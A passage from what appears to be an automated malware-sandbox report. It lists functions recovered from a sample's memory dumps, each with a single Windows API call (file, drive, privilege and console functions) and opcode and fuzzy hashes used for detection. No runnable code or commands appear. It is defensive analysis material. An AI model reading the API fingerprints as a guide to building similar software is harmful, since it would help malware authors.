                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 392d62aaae19f48b68bf8bade65193f2580a7b32e4d15c9d799a5a7695054dec
                                                        • Instruction ID: fd615cfa7e5a7f0ecc02ad9ff2bc598c96d2d5681e8bf873a406a419d6cbd6c2
                                                        • Opcode Fuzzy Hash: 392d62aaae19f48b68bf8bade65193f2580a7b32e4d15c9d799a5a7695054dec
                                                        • Instruction Fuzzy Hash: EE21D4755097C09FDB12CB25DC55A96BFA4EF07210F0984DBEC858F163D2289848CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028910D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 27c8b7d86701cdafa807ca9a882e90836ba61c872bd57d248b964542a2007c7e
                                                        • Instruction ID: 38c10cf41f5e8c98e0abb97d405b0deea2d9fed36844794ba70ca56dcfab7fd5
                                                        • Opcode Fuzzy Hash: 27c8b7d86701cdafa807ca9a882e90836ba61c872bd57d248b964542a2007c7e
                                                        • Instruction Fuzzy Hash: 76214D7540D3C4AFD7138B259C54A62BFB4EF57620F0D80DBE8898F2A3D2695818D7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 01E0AFBE
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 4ed6bd82eecff5f492eda19b8fd1545b880dcd9dc1edb015ab9776ad82491591
                                                        • Instruction ID: a51eeeb8b6f7eba02151f21701983dc45c463d588bd0656b83cb47543cd6ce94
                                                        • Opcode Fuzzy Hash: 4ed6bd82eecff5f492eda19b8fd1545b880dcd9dc1edb015ab9776ad82491591
                                                        • Instruction Fuzzy Hash: 9011C471500304EFEB22DF55DC45BAAFBA8EF48720F14846AFD458B181D674A944CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 028908E5
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 8277f6d0b52e70d24f5648468ed44b361636c7d33cdff5992e4cdfb35a90815a
                                                        • Instruction ID: 7df2dade6b715d9040a703c270b48a1af032a491a638cb80fcad33070a927a7a
                                                        • Opcode Fuzzy Hash: 8277f6d0b52e70d24f5648468ed44b361636c7d33cdff5992e4cdfb35a90815a
                                                        • Instruction Fuzzy Hash: 79110176000304EFFB21DF50DC44FA6FBA8EF08320F18845AFD099A241C274A504CBB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E0BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: ef2dc4dea7e1712585254de53632d79e3ee2211933dc584f6f525ff60e7cff78
                                                        • Instruction ID: abd5e2aec2504a889b402b32b4d1f2b95876394a1321d85d529823ca052f24e9
                                                        • Opcode Fuzzy Hash: ef2dc4dea7e1712585254de53632d79e3ee2211933dc584f6f525ff60e7cff78
                                                        • Instruction Fuzzy Hash: 34119D76504380AFDB22CF65DC44B56FFF4FF09210F08849AE9898B662D375A458CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028912D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: c9f028ff7463acb785a3f59f1effc81576857a57f872e1cf835fa95d6972869b
                                                        • Instruction ID: 9fa32bc5547d836f524192c718b66c2ff9453628915c01ffa5a42e5299848225
                                                        • Opcode Fuzzy Hash: c9f028ff7463acb785a3f59f1effc81576857a57f872e1cf835fa95d6972869b
                                                        • Instruction Fuzzy Hash: B511C1755083809FDB11CF25DC49B96FFA4EF06220F0884EEED498B252D239A808CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01E0A39C
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 968d15aa6ad9cd0d76fd23c0f7f5773a2268a993ec5a70df2f6038cc6486a5c1
                                                        • Instruction ID: 308b28cc22ba4989e6079bca79be2c349459f8f6a2b1076edbec6f5f58d51cae
                                                        • Opcode Fuzzy Hash: 968d15aa6ad9cd0d76fd23c0f7f5773a2268a993ec5a70df2f6038cc6486a5c1
                                                        • Instruction Fuzzy Hash: 95118F714093C49FE7128B15DC54A66BFB4DF47614F0880DAEDC44F253D269A848DB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028905E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 988511c5f6726aac080766953ff43ddb7d84775d4ab6d7df8f5936bdce0d4125
                                                        • Instruction ID: fec479d1429611c0ce3f157d27b82b856847ed534141a3b2d1f99d07f3cfe8c0
                                                        • Opcode Fuzzy Hash: 988511c5f6726aac080766953ff43ddb7d84775d4ab6d7df8f5936bdce0d4125
                                                        • Instruction Fuzzy Hash: EB11C2755093C09FDB128B15DC95B52FFB4DF47220F0880DBED898B663D265A908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 05a95946cedc384b21ba7953a868413159dcbfb681600672bec0d4344c823832
                                                        • Instruction ID: c9d8abe1a8b8c1df001b3bf46689a958105d207ce774292c1f7a85edda79cae2
                                                        • Opcode Fuzzy Hash: 05a95946cedc384b21ba7953a868413159dcbfb681600672bec0d4344c823832
                                                        • Instruction Fuzzy Hash: 4F1190754093C09FE712CB25DC55B92BFA4EF07324F0980DAD9888B163C265A908CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E0AB1A
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        • Opcode ID: 91c2989271168a280d9a52400ffa32470f8af8e425ec393317b0b1073b5e0559
                                                        • Instruction ID: 07d08a0b808e942c643265e477a78cb565b76a69a31b8e4a893a00224538f65d
                                                        • Opcode Fuzzy Hash: 91c2989271168a280d9a52400ffa32470f8af8e425ec393317b0b1073b5e0559
                                                        • Instruction Fuzzy Hash: 3311A5716007049FEB21DF69DC85B5AFBD8EF44210F08C47AED0ACB282D674E444CA71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01E0AA71
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 6b02beaabec3af81c271d2484760ab00b90c9b30ee95955f26711fc526dceb1a
                                                        • Instruction ID: e86d72504c14216f0cac98ba3225f16929a41bc0d4b2c9d3da8adc90fe209c7c
                                                        • Opcode Fuzzy Hash: 6b02beaabec3af81c271d2484760ab00b90c9b30ee95955f26711fc526dceb1a
                                                        • Instruction Fuzzy Hash: 5B11C1754097C49FD7128B15DC85A91BFB0EF07224F0980DBDD858F1A3D268A949C772
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028907C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,8DD6912B,00000000,00000000,00000000,00000000), ref: 02890819
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 463b90ea0fe01b4024254c879301fa2b679210498d81f72b9e4f1b9db3fd6439
                                                        • Instruction ID: aee1d5eabd6ce91ca1099bc707ee050bb82e583d7cf24d6add3f0356df346a94
                                                        • Opcode Fuzzy Hash: 463b90ea0fe01b4024254c879301fa2b679210498d81f72b9e4f1b9db3fd6439
                                                        • Instruction Fuzzy Hash: CF01C079600304EFFB20DF05DC85BA6FB98DF04721F188096FD089A241D674A904CAB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028913AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        • Opcode ID: 11fc27a28c6c295eb676d87084b2c642eed8d33b4a00873892f9aa11ee3e0d66
                                                        • Instruction ID: 219bd51ee3c4ccb9b7be9bb817af37af381413f9d3f5f9adca28ad35cbff00ae
                                                        • Opcode Fuzzy Hash: 11fc27a28c6c295eb676d87084b2c642eed8d33b4a00873892f9aa11ee3e0d66
                                                        • Instruction Fuzzy Hash: 6011AC79504700DBEF20DF55D888B66FBA4EB09220F08C4AAEC0ACA612D235E408DA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01E0ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 6a071df13cc4fc0e1a10b512cc4eb3f3a3feae2d37ea99feeed7db5d499b31cd
                                                        • Instruction ID: 2f1d37c5f93fe8ac5b041ca4a3839e519d0e0beeb773452cdd4420edd5444a1f
                                                        • Opcode Fuzzy Hash: 6a071df13cc4fc0e1a10b512cc4eb3f3a3feae2d37ea99feeed7db5d499b31cd
                                                        • Instruction Fuzzy Hash: B311C2B54097849FDB11CF55EC85B92BFA4EF42224F0980ABED498F153D274A548CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E0BA7E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 07b3ab09a67161af3b70b06efc49ca7bcfd29b7953203b8c802aac2a3e537ba8
                                                        • Instruction ID: 29cdbc04356be627942bd5eb0d6ea67169b7861389e2983631eed0994f7e8258
                                                        • Opcode Fuzzy Hash: 07b3ab09a67161af3b70b06efc49ca7bcfd29b7953203b8c802aac2a3e537ba8
                                                        • Instruction Fuzzy Hash: 97118E76500700DFEB22DF55DC44B66FBF4FF08211F0884AAED498A652D375E494DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 028901D0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: bbeb24f27bab52c4361f5fc0bb0200a73b465f058eb05df02624fe6c962713ff
                                                        • Instruction ID: 6b467b98083bdd3c5e5ae501c93b570d5e2e3d0cc4e680904f67bcb375bb7509
                                                        • Opcode Fuzzy Hash: bbeb24f27bab52c4361f5fc0bb0200a73b465f058eb05df02624fe6c962713ff
                                                        • Instruction Fuzzy Hash: CC019E79604704CFEB10DF65DC85766FBA8DB01224F1884AADC09CB642D774E404CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0289109E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 05fdb64d19b31c40892071bb6fb868db72c82b56076c33fd9171af0c25038fd3
                                                        • Instruction ID: 54284314156eae335457f14a3d568f89ed32eb369a0e15f3e3b1068d50b4f442
                                                        • Opcode Fuzzy Hash: 05fdb64d19b31c40892071bb6fb868db72c82b56076c33fd9171af0c25038fd3
                                                        • Instruction Fuzzy Hash: 9F017171940600ABE350DF16DC86B76FBA8FB88A20F14816AED089B741D235B515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01E0A23E
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleCtrlHandler
                                                        • String ID:
                                                        • API String ID: 1513847179-0
                                                        • Opcode ID: 9271ca227da9e255c37e6b6368d6aef75da117019122e223a5670b2e416b3ad0
                                                        • Instruction ID: 1b18fcc68597af9f263d98cd5cba230a3c3940eec31d51167e6696af42e26963
                                                        • Opcode Fuzzy Hash: 9271ca227da9e255c37e6b6368d6aef75da117019122e223a5670b2e416b3ad0
                                                        • Instruction Fuzzy Hash: 5C018471940600AFE310DF16DC86B76FBB8FB88A20F14816AED089B741D235F515CBE5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028912FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0289132F
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        • Opcode ID: c8e9001548e97947410ffb915dac7f8f96a1768b36f74f34dce49675f5286ab8
                                                        • Instruction ID: e937d9b479b0ef1240efbf347b4bec58e99426472aa5c6338c56a1ef05d4f0c8
                                                        • Opcode Fuzzy Hash: c8e9001548e97947410ffb915dac7f8f96a1768b36f74f34dce49675f5286ab8
                                                        • Instruction Fuzzy Hash: DF01BC79504300DFEF10DF15D8897A9FBA4EF09620F0CC4AAEC09CB642D279A404DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 01E0BB2F
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: BufferConsoleInfoScreen
                                                        • String ID:
                                                        • API String ID: 3437242342-0
                                                        • Opcode ID: 0da15de3efba9f20ac5571de9056fc6bab7e7ef878c9c284e971b24ff9dfec37
                                                        • Instruction ID: b10a357b261db3062d7d230d87f00fac5f181c15098b3ef1908ae92f0e797f34
                                                        • Opcode Fuzzy Hash: 0da15de3efba9f20ac5571de9056fc6bab7e7ef878c9c284e971b24ff9dfec37
                                                        • Instruction Fuzzy Hash: 2601D475500600DFEB21DF15DC857A9FB94EF09620F08C4AADD0A8B296D279D444CF61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 028904B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02890502
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: c479d04d8ffbddf6a138598e6a098ad4735f62dbf1bd505215a0ca81ef5f5d69
                                                        • Instruction ID: 378b90748e69d8eeac17929f5245e31532302c6d5580bd1764d03b60e33a78e2
                                                        • Opcode Fuzzy Hash: c479d04d8ffbddf6a138598e6a098ad4735f62dbf1bd505215a0ca81ef5f5d69
                                                        • Instruction Fuzzy Hash: C901A271940600ABD310DF16DC86B36FBB4FB88B20F14811AEC084B741D235F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02890F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02890FB0
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        • Opcode ID: a3a3caa1bb2eb99dee969dbf2ae4aefbe58bb528e8cf4c8ddf3d5a6718804281
                                                        • Instruction ID: 221f51e23b139443ebbf3d4bf5984ed5a7731d8d450e7f9af44f5b527ac163bf
                                                        • Opcode Fuzzy Hash: a3a3caa1bb2eb99dee969dbf2ae4aefbe58bb528e8cf4c8ddf3d5a6718804281
                                                        • Instruction Fuzzy Hash: D501BC79500304CFEB10DF15DC89B66FB94EB00224F0880AADC08CF686D374E548CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E0A94A
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: 25f16ddeb6a8733cdebe0f3c7bbc753d7236c72ec5dbbba1dded3d91f597f3c6
                                                        • Instruction ID: 4e134bdcc63592c09e07631fed782047d4548e85c5b851f2eb726f8adfdc2e5b
                                                        • Opcode Fuzzy Hash: 25f16ddeb6a8733cdebe0f3c7bbc753d7236c72ec5dbbba1dded3d91f597f3c6
                                                        • Instruction Fuzzy Hash: 5501D671940600ABD310DF16DC86B36FBB4FB88B20F14811AED084B741D235F515CBE6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02890640
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        • Opcode ID: 6635403cf4d6d4cf49a5c84b1efe197b02db9a8a33dd2287d330fdaa2484138f
                                                        • Instruction ID: 20f166708ddb588fd8788540cb2ea2858721b7093b2c22878199a71fd88d3d58
                                                        • Opcode Fuzzy Hash: 6635403cf4d6d4cf49a5c84b1efe197b02db9a8a33dd2287d330fdaa2484138f
                                                        • Instruction Fuzzy Hash: 2901F479500704CFEF119F15D885765FBA0DF45624F08C0AAEC098B753D375E448DAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01E0ABC9
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        • Opcode ID: 678eb7379f678fed9bfc7192f91a1a35ba13a08fa9a42f4fc18d20a17e6b93d8
                                                        • Instruction ID: 5e72ba9deab9e4e40a38f795b67ffff90137f3a544866d33327c583c917cdf76
                                                        • Opcode Fuzzy Hash: 678eb7379f678fed9bfc7192f91a1a35ba13a08fa9a42f4fc18d20a17e6b93d8
                                                        • Instruction Fuzzy Hash: E401D131404744CFEB11DF59EC89BA5FB94DF44224F08C4AADD098F246D274A484CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 02891116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02891148
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        • Opcode ID: 88cb46fb740a717a14f411580894c935b46d86483d19a7a65726bd6e8912995e
                                                        • Instruction ID: 4a51075bc4406661228383102ff9b81cadc872bb3e646d9865715736d2b1ffb7
                                                        • Opcode Fuzzy Hash: 88cb46fb740a717a14f411580894c935b46d86483d19a7a65726bd6e8912995e
                                                        • Instruction Fuzzy Hash: 44F0FF38504744EFEB20DF05D889765FBA0EF05A21F08C09ADC0C8B312C279A448CEA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0289096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0289099C
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2167179842.0000000002890000.00000040.00000001.sdmp, Offset: 02890000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        • Opcode ID: 3deec733d98bd59dc4551d41ceae4645ff6d9998b645adfef00bfde134ec4c89
                                                        • Instruction ID: 65032ab4ce956ff7e9df85be5ea86d4c097fa2dc056cf70a32b7e5f9eb68d2aa
                                                        • Opcode Fuzzy Hash: 3deec733d98bd59dc4551d41ceae4645ff6d9998b645adfef00bfde134ec4c89
                                                        • Instruction Fuzzy Hash: 0DF0C239904744DFEF20DF05D889765FBA0EF15726F08C09ADD498B316D379A448CAA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNELBASE(?), ref: 01E0A39C
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ErrorMode
                                                        • String ID:
                                                        • API String ID: 2340568224-0
                                                        • Opcode ID: 5254cd1571b9bbd3182591b38a219cc98d9b710cd6db503d7e78cd7849df8d59
                                                        • Instruction ID: b655b0d4146cf3d42b818d4daf60d5220c1127e6c4f134c25317f007c3b7ff16
                                                        • Opcode Fuzzy Hash: 5254cd1571b9bbd3182591b38a219cc98d9b710cd6db503d7e78cd7849df8d59
                                                        • Instruction Fuzzy Hash: 70F0AF35504744DFEB21DF05D889769FBA0EF49625F08D0AADD094B352D3B9A488CBA2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0AA42, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01E0AA71
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        • Opcode ID: 4ecb3c79d601ccd6a846ee6510343512d8ef741369f5bf030b5a9da8dff27de1
                                                        • Instruction ID: 20d9596f8cb89e32e6e97ec11f378b7a4b319c50a3864dab4db07d320fc3a62a
                                                        • Opcode Fuzzy Hash: 4ecb3c79d601ccd6a846ee6510343512d8ef741369f5bf030b5a9da8dff27de1
                                                        • Instruction Fuzzy Hash: 50F0F631500744CFEB21DF05E989765FBA0DF49625F08C0AADD094F382D278A588CBB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0A974, Relevance: 1.3, APIs: 1, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01E0A9C8
                                                        Memory Dump Source
                                                        • Source File: 0000001D.00000002.2158812232.0000000001E0A000.00000040.00000001.sdmp, Offset: 01E0A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 5c05239dfb92337fb6ba5e1acc0a953906b59af3d24125c5b2f8e76e5e930c9d
                                                        • Instruction ID: f7cfea842875ae5c0fa9ed4aa099d70d6540471a4253d2eeb703ce5572306a79
                                                        • Opcode Fuzzy Hash: 5c05239dfb92337fb6ba5e1acc0a953906b59af3d24125c5b2f8e76e5e930c9d
                                                        • Instruction Fuzzy Hash: 3611E3715093849FD712CF25DC48B96FFB4DF46220F0980EBEC458B293D239A848CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01E0A996, Relevance: 1.3, APIs: 1, Instructions: 43COMMON
